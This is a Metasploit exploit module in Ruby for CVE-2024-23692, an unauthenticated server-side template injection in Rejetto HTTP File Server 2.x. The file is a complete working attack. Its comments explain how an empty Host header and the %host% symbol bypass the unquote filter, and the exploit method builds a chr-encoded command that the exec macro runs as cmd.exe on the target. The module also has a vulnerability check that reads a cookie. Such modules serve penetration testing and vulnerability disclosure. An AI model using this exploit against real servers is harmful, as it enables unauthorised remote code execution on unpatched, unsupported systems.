    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution',        'Description' => %q{          The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template          injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges          of the user account running the HFS.exe server process. This exploit has been tested to work against version          2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers          and no patch is available. Users are recommended to upgrade to newer supported versions.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # Metasploit exploit          'Arseniy Sharoglazov' # Original finder        ],        'References' => [          ['CVE', '2024-23692'],          ['URL', 'https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/'],        ],        'DisclosureDate' => '2024-05-25',        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Privileged' => false,        'Targets' => [          [            # Tested against Rejetto HFS version:            # * 2.4.0 RC7            # * 2.3m            'Automatic', {}          ],        ],        'Payload' => {          'BadChars' => '"'        },        'DefaultOptions' => {          'RPORT' => 80        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            # If the HFS.exe process is run in a desktop session, the payload cmd.exe window will momentarily popup.            SCREEN_EFFECTS          ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base path to the web application', '']),      ]    )  end  def send_ssti_request_cgi(template, opts = {})    opts['vars_get'] ||= {}    opts['headers'] ||= {}    # The 'search' query parameter is echoed into the content before server side template processing occurs on the    # content being processed. Under normal operation any user supplied content will be escaped, so any symbols, which    # are encoded as '%symbol%' and macro which are encoded as '{:macro:}' will be escaped to prevent SSTI.    # However we can force a percent symbol to become un-escaped. This allows us to embed any symbol in the content    # being processed. We can leverage this to force the '%url%' symbol to become unescaped. This will echo back the    # remainder of the un-encoded URL into the server side content.    # To inject our own content, we need to first write a MARKER_UNQUOTE ':}' sequence,    # however this will be filtered. We can then bypass the filtering for ':}' by leveraging the %host% symbol and an    # empty host header value. So ':%host%}' will become ':}' and this will not be escaped. After this happens we can    # perform an arbitrary template injection of any HFS symbols or macros we want.    opts['vars_get'].merge!({      'search' => "%25#{Rex::Text.rand_text_alpha(1)}%25url%25:%host%}#{template}"    })    # The Host header must be an empty string for the above symbol substitution to bypass the MARKER_UNQUOTE filtering.    opts['headers'].merge!({      'Host' => ''    })    opts['method'] = ['GET', 'POST'].sample    opts['uri'] = normalize_uri(target_uri.path)    opts['encode_params'] = false    send_request_cgi(opts)  end  def check    cookie_name = Rex::Text.rand_text_alphanumeric(32)    cookie_value = Rex::Text.rand_text_alphanumeric(32)    # Our check routine will leverage the SSTI vulnerability and use it to read a cookie value by its name, writing    # this value to the response output. In addition we will write the current server version into the response output.    # We can therefore verify if a target is vulnerable by first confirming the expected cookie value is now present    # in the response output, and if so we can also pull out the target servers version number.    res = send_ssti_request_cgi(      "{.cookie|#{cookie_name}.}=%version%=",      {        'headers' => {          'Cookie' => "#{cookie_name}=#{cookie_value}"        }      }    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200    version = res.body.match(/#{cookie_value}=([^=]+)=/)    return CheckCode::Vulnerable("Rejetto HFS version #{version[1]}") if version    CheckCode::Safe  end  def exploit    command_string = "\"cmd\" \"/c #{payload.encoded}\""    command_chars = command_string.unpack('C*').join('|')    # To get code execution we leverage the 'exec' macro. We must leverage the 'chr' macro to construct an arbitrary    # command string in order to avoid the server filtering out certain characters such as '%'. To avoid executing the    # payload 4 times, we leverage the 'break' macro to stop processing the output.    send_ssti_request_cgi("{.exec|{.chr|#{command_chars}.}.}{.break.}")  endend

Tag

#mac